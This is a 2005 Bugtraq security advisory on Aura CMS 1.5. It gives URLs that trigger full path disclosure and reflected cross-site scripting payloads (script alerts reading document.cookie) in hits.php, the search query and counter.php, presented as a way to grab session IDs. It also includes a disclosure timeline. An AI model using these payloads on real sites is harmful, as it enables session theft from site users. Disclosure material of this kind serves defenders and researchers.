[<prev] [next>] [day] [month] [year] [list]
Message-ID: <20050302140435.4027.qmail@www.securityfocus.com>
Date: 2 Mar 2005 14:04:35 -0000
From: echo staff <y3dips@...o.or.id>
To: bugtraq@...urityfocus.com
Subject: Vulnerabilities in Aura CMS
---------------------------------------------------------------------------
Vulnerabilities in Aura CMS
---------------------------------------------------------------------------
Author: y3dips
Date: Januari, 25th 2005
Location: Indonesia, Jakarta
Web: http://echo.or.id/adv/adv011-y3dips-2005.txt
---------------------------------------------------------------------------
Affected software description:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
auraCMS (Content Management System)
version: 1.5
date : 21 September 2004
lisensi: GPL - http://www.gnu.org/licenses/licenses.html#GPL
Author: Arif Supriyanto - arif@....kliksini.com
http://www.semarang.tk
http://www.ayo.kliksini.com
http://www.auracms.opensource-indonesia.com
Description:
auraCMS is a PHP script package that you to possiblity to building
a website with dynamic content easier and faster, no waste time more.
---------------------------------------------------------------------------
Vulnerabilities:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
A. Full Path disclosures
==>> http://[site]/[aura]/?pilih=teman&id=34%60select%20all
Warning: mysql_fetch_row(): supplied argument is not a valid MySQL result resource in
/home/cxxo/public_html/aura/teman.php on line 9
==>> http://[site]/[aura]/?pilih=hal&id=4%60tes
Warning: mysql_fetch_row(): supplied argument is not a valid MySQL result resource in
/home/cxxo/public_html/aura/hal.php on line 10
==>> http://[site]/[aura]/?pilih=arsip&topik=1%60
Warning: mysql_fetch_row(): supplied argument is not a valid MySQL result resource in
/home/cxxo/public_html/aura/arsip.php on line 11
B. Session ID
CMS with This version has two method of authentication (session and cookies) ,
this problem has found in session method .
There are so many variable that havent declared yet, it makes attacker could
exploit it by inputing some "character" n gaining an session id on windows pop up
for eXample
---- hits.php -----
<?
$perintah = "SELECT * FROM counter WHERE id=1";
$hasil = mysql_query( $perintah );
while ($data = mysql_fetch_row($hasil)) {
$hits=$data[3];
}
echo "<b>$hits</b>";
?>
-------end -------
look $hits variable , do you see something interested ? yes SIR , we've found something
lets do some try
==>> http://[site]/[aura]/hits.php?&hits=%3Cscript%3Ealert(document.cookie)%3C/script%3E
then you get the session ID
another vulnerable :
in pencarian (search) input box
+ http://[site]/[aura]/index.php?query=%3Cscript%3Ealert(document.cookie)%3C/script%3E&pilih=search
also in counter module
+ http://[site]/[aura]/counter.php?theCount=%3Cscript%3Ealert(document.cookie)%3C/script%3E
p.s : Wanna know what session IDs gives you ? try google :D
---------------------------------------------------------------------------
FIx :
founded : Januari 25th 2005
reported to vendor :Februari 15th 2005
;vendor respond but not yet releasing any patch
publish at securityfocus : March 2th 2005
---------------------------------------------------------------------------
Shoutz:
~~~~~~~
~ m0by, the_day, comex, z3r0byt3, K-159, c-a-s-e, S`to, lirva32, anonymous
~ newbie_hacker@...oogroups.com ,http://forum.ehco.or.id
~ #e-c-h-o@...NET
---------------------------------------------------------------------------
Contact:
~~~~~~~~
y3dips || echo|staff || y3dips[at]gmail[dot]com
Homepage: http://y3dips.echo.or.id/
-------------------------------- [ EOF ] ----------------------------------
Powered by blists - more mailing lists